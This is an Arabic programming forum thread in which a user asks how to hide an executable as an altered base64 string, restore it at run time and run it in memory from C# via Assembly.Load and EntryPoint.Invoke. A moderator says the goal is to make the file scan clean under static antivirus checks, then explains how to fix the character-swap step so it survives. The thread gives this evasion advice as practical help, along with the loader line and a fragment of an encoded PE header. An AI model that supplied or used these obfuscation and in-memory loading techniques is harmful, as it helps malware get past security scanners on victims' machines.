ما هو الخطأ عندي شباب c#

• (واستعينوا بالصبر والصلاة وإنها لكبيرة إلا على الخاشعين)
    لاتضيع صلاتك .. تعتبر الصلاة الركن الثاني من أركان الاسلام، حيث لا يصحّ إسلام مسلمٍ إلا بها

• (وماكان الله معذبهم وهم يستغفرون) ..الاستغفار هو السبيل الأقرب لنيل رضى الله عز وجل
    اللهم أنت ربي لا إله إلى أنت خلقتني وأنا عبدك، وأنا على عهدك ووعدك ما استطعت، أعوذ بك من شر ما صنعت، أبوء لك بنعمتك علي، وأبوء بذنبي فاغفر لي فإنّه لا يغفر الذنوب إلّا أنت

mohmaad22

:: عضو جديد ::
21 أبريل 2021
7
4
0
السلام عليكم شباب انا بدي حول القيم من سترينج لبايت اراي وبعدها اعمل replace لشار معين وبعدها شغل القيم بنقطة الادخال بس عند تشغيل نقطة الادخال فيها مشكلة ازا تكرمتو شو الحل ورمضان كريم علينا وعليكم يا رب1586

mohmaad22

21 أبريل 2021
7
4
0
السلام عليكم شباب انا بدي حول القيم من سترينج لبايت اراي وبعدها اعمل replace لشار معين وبعدها شغل القيم بنقطة الادخال بس عند تشغيل نقطة الادخال فيها مشكلة ازا تكرمتو شو الحل ورمضان كريم علينا وعليكم يا رب

المرفقات

• أعجبني
التفاعلات: BasharBachir

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
1,169
2,054
1
وعليكم السلام ورحمة الله وبركاته
انت قلت اخي انك تحول "سترينج" الى بايت اراي .. السؤال هنا ماهو نوع السترينج اللي بتقوم بتحويله ؟
بعدين قلت انك بتعمل ريبليس لتشار معين بعد التحويل الى بايت اراي .. الباي اراي اخي عناصرها كما تعلم بايتات وكل بايت هو رقم اي لايوجد اي تشار بالموضوع
هنا شرح رح يحاكي اللي بدك ياه ..

• أحببته
التفاعلات: mohmaad22

mohmaad22

21 أبريل 2021
7
4
0
مثل هيك اخي العزيز
[String]$TTTTS00788xxxcccc8880000SSSSSSS='77,90,144,0,3,0,0,0,4'.replace('0','0')
هاي ب الباور شيل اريد ان اعملها ب سي شارب واقدر اعمل لود للقيم بنقطة ادخال بدون مشاكل مثل ما في صورة الي ارفقتها

• أعجبني

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
1,169
2,054
1
مثل هيك اخي العزيز
[String]$TTTTS00788xxxcccc8880000SSSSSSS='77,90,144,0,3,0,0,0,4'.replace('0','0')
هاي ب الباور شيل اريد ان اعملها ب سي شارب واقدر اعمل لود للقيم بنقطة ادخال بدون مشاكل مثل ما في صورة الي ارفقتها
لازم تعرف انه اللي طلبته مش ممكن بالشكل اللي انت متخيله بالسي شارب ..
ليش ؟ لان انت قلت بعد ماتجيب بايتات الملف .. رح تستبدل """"تشار"""" معين ..عناصر البايت اراي هي سلسلة من البايتات .. لهيك مافيه شي اسمه تشار بالبايت اراي
وانما لو كان عندك سترينج وقتها كل عنصر من عناصر السترينج بيسمى تشار .. محرف يعني ..
ف انت بدك تستبدل البايتات الصفرية ببايت اخر عشان تعطب الملف وتخليه كلين بالفحص الاستاتيكي "سكان تايم"
وانا اعطيتك اخي الحبيب الطريقة اللي توصلك لطلبك ..
رح يتم استبدال اي بايت تريده لو البايت الصفري لو اي بايت .. ببايت اخر .. ووقت التشغيل رح ترجع البايت الصفري مكان "في حال اخترت استبدال البايت الصفري من الاول"
ياريت تكتب طلبك بشكل صحيح برمجيا عشان اساعدك بس حسب مافهمت منك .. اللي عطيته لك بيحقق طلبك ..

• أعجبني

mohmaad22

21 أبريل 2021
7
4
0
لازم تعرف انه اللي طلبته مش ممكن بالشكل اللي انت متخيله بالسي شارب ..
ليش ؟ لان انت قلت بعد ماتجيب بايتات الملف .. رح تستبدل """"تشار"""" معين ..عناصر البايت اراي هي سلسلة من البايتات .. لهيك مافيه شي اسمه تشار بالبايت اراي
وانما لو كان عندك سترينج وقتها كل عنصر من عناصر السترينج بيسمى تشار .. محرف يعني ..
ف انت بدك تستبدل البايتات الصفرية ببايت اخر عشان تعطب الملف وتخليه كلين بالفحص الاستاتيكي "سكان تايم"
وانا اعطيتك اخي الحبيب الطريقة اللي توصلك لطلبك ..
رح يتم استبدال اي بايت تريده لو البايت الصفري لو اي بايت .. ببايت اخر .. ووقت التشغيل رح ترجع البايت الصفري مكان "في حال اخترت استبدال البايت الصفري من الاول"
ياريت تكتب طلبك بشكل صحيح برمجيا عشان اساعدك بس حسب مافهمت منك .. اللي عطيته لك بيحقق طلبك ..
شكرا على توضيح الله يوفقك يا رب , الفكرة وصلت عندي تقريبا يعني فهمت شو قصدك هلأ يسلمو اخي العزيز

• أعجبني

mohmaad22

21 أبريل 2021
7
4
0
System.Reflection.Assembly.Load(Convert.FromBase64String((string)NewLateBinding.LateCall("as", null, "concat", new[] { "TVqQ55M5555E5555//855Lg555555555Q55555555555555555555555".Replace("5", "A") }, null, null, null, true))).EntryPoint.Invoke(null, null);

اخي ولله ما عارف شو قلك بس ازا امكنك ساعدني بهاي لما اعمل مسج بوكس ما في مشكل يستبدل 5 ب A
بس عند عمل لود ما بشتغل

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
1,169
2,054
1
مثل هيك اخي العزيز
اهلا اخي واسف على التاخر بالرد ...
لازم تفهم اول الشي ليش عمتواجه مشكلة اخي ..
انت عمتجيب قيم البيس 64 لملف ما ..وعمتستبدل كل A ب 5
المشكلة اللي عمتصير معاك انك وقت تجي ترجع ال A فانت عمستتبدل كل الخمسات ب A وهون مشكلة
لان فيه بقيم ملفك الاساسية خمسات من اساس الملف فعمينعطب معاك ..
يعني لنفترض انه قيم ملفك البيس64 الاصلية الشغالة اللي ملازم تتغير بعد الاستبدال هي التالي
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBy
لاحظ القيم فيها رقم 5 من اساس الملف يعني ماينفع بعد الاستبدال انك تحولها ل A
خلنا نعمل اللي عمتسويه ونستبدل كل A ب 5
الناتج بيكون التالي

TVqQ55M5555E5555//855Lg555555555Q55555555555555555555555555555555555555555555555g555554fug45t5nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBy
لاحظ انه ال5 الاصلية اختلطت مع الخمسات اللي مش اصلية ..
فوقت بدك ترجع كل 5 الى A رح تصير خمستنا الاصلية كمان A والملف رح ينعطب ..
اتمنى انك فهمت ليش عمصير معاك هالمشكلة ..
وان قلت لي فيه ملفات عمتزبط فالسبب هو اللي شرحته فوق بيكون الملف فيه بايت مفقود مابيحتوي على جميع البايتات من 0 الى 255
وهاد هو اللي انا استغليته بشرحي اللي ارفقته لك فوق ..اما الملف الثاني اللي عمتجرب عليه ومايمشي الحال بيكون البايت موجود ..
بالتوفيق

mohmaad22

21 أبريل 2021
7
4
0
:D يا خييي ولله انتا معلم ...تأكيد لكلامك لما كنت استبدل AبA كان يشتغل الملف طبيعي , بس لما هلاء انتا شرحتلي الشي هاد اتوضحت الفكرة
رمضان كريم علينا وعليك صديقي ويوفقك ربي

• أعجبني

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
1,169
2,054
1
:D يا خييي ولله انتا معلم ...تأكيد لكلامك لما كنت استبدل AبA كان يشتغل الملف طبيعي , بس لما هلاء انتا شرحتلي الشي هاد اتوضحت الفكرة
رمضان كريم علينا وعليك صديقي ويوفقك ربي
نعم فقط ابحث بقيم ملفك عن محرف من المحارف مش موجود بقيم ملفك .. واستبدل اي قيمة اصلية فيه
هيك تضمن انه وقت تجي ترجع ماينعطب شي وماتروح تغير قيمة اساسية بالملف
بالتوفيق لك وامين على دعائك لك بالمثل ان شاء الله

• أحببته